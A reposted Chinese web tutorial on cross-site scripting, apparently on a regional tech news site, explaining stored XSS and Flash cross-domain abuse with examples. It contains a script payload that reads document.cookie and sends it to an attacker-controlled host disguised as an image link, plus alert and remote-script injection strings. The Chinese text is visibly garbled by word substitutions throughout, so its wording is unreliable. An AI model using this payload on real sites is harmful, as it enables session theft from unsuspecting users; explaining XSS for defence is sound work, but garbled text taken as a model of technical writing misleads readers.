加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

“黑客”必学进攻之“跨站剧本进攻”

发布时间:2018-12-10 05:03:55 所属栏目:业界 来源:信息安全我来讲你来听
导读:最近许多小搭档们看了我的文章给我私信说能不能讲讲跨站剧本进攻技能,本日就以本篇文章具体讲授一下黑客常用的进攻伎俩跨站剧本进攻。 一、 什么是跨站剧本进攻? 官方界说:(Cross Site Scripting),为了反面(Cascading Style Sheets, )的缩写夹杂,故将

有些开拓职员通过把相应的MIME范例配置为text/plain可能除text /html以外的任何对象来防备AJAX相应被注入HTML。HTML注入将无法举办,由于赏识器不会把相应表明为HTML。然而,Flash并不体谅跨域计策文件是哪种MIME范例,以是进攻者有也许行使AJAX相应来反射一个不安详的跨域计策文件。

这应承恶意的Flash应用措施以受害者名义向有瑕玷的Web应用措施发送哀求,读取该域上的恣意的页面,并建设达到该域的套按字毗连。这种范例的进攻的威胁相对较弱,由于恶意的Flash应用措施不能窃取Cookie(可是它如故可以以用户的名义来完成任何举措),并且它不能在受害的用户前仿照成应用措施,除非恶意的Flash应用措施将用户重定向到一个进攻者节制下的域。

然而,到今朝为止,HTML注入所能做的最险恶的工作照旧在受害用户今朝把本身装扮成Web应用措施,虽然,通过其余要领也可以到达此目标,好比反射一个不安详的跨域计策文件,并行使ActionScript的XML类发送HTTP的GET和POST哀求而且读取相应。 在下一节中,我们描写进攻是怎样作恶的。

六、XSS进攻实例说明

例1、简朴XSS进攻

留言类,简朴注入javascript

有个表单域:

  1. <input type="text" name="content" value="这里是用户填写的数据"> 
  • 假行使户填写数据为:
    1. <script>alert('foolish!')</script>(可能<script type="text/javascript" src="./xss.js"></script>) 
  • 提交后将会弹出一个foolish告诫窗口,接着将数据存入数据库
  • 比及此外客户端哀求这个留言的时辰,将数据取出表现留言时将执行进攻代码,将会表现一个foolish告诫窗口。

【将数据改成html标签举办进攻,则会将本来的样式打乱。】

例2、偷取cookie

  • 网站地址域名为www.test88.com、进攻者节制的主机www.linuxtest.com
  • test88.com中的表单,xss.html
  • “黑客”必学进攻之“跨站剧本进攻”

  • 恶意进攻者插入响应代码
  • “黑客”必学进攻之“跨站剧本进攻”

  • 数据(进攻代码)插入数据库
  • 进攻者节制的主机中配置吸取偷取的cookie
  • “黑客”必学进攻之“跨站剧本进攻”

开始模仿测试

(1) test88.com中配置天生sessionID代码

(2) 客户端会见上面代码并生本钱身的sessionID

(3) 客户端会见xss.html

#下面为模仿被进攻后取出数据的xss.html代码(表现数据)

  1. <!DOCTYPE html>  
  2. 2 <html>  
  3. 3 <head>  
  4. 4 <title>xss进攻</title>  
  5. 5 <meta charset="utf-8">  
  6. 6 </head>  
  7. 7 <body>  
  8. 8 <form action="./test99.php" method="post">  
  9. 9 留言:<input type="text" name="content" value=""><br/>  
  10. 10 <input type="submit" name="" value='提交'>  
  11. 11 </form>  
  12. 12 <br/>留言记录:<br/>  
  13. 13 <script>  
  14. 14 var Str=document.cookie; //获取cookie  
  15. 15 var a =document.createElement('a'); //建设a标签  
  16. 16 a.href='http://www.linuxtest.com/test2.php?'+Str; //进攻者主机  
  17. 17 a.innerHTML="<img src='./aa.jpg'>"; //呵护图片  
  18. 18 document.body.appendChild(a); //将标签添加到页面中  
  19. 19 </script>  
  20. 20 </body>  
  21. 21 </html> 

“黑客”必学进攻之“跨站剧本进攻”

(4) 客户端不警惕点击到图片,sessionID将被盗

“黑客”必学进攻之“跨站剧本进攻”

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读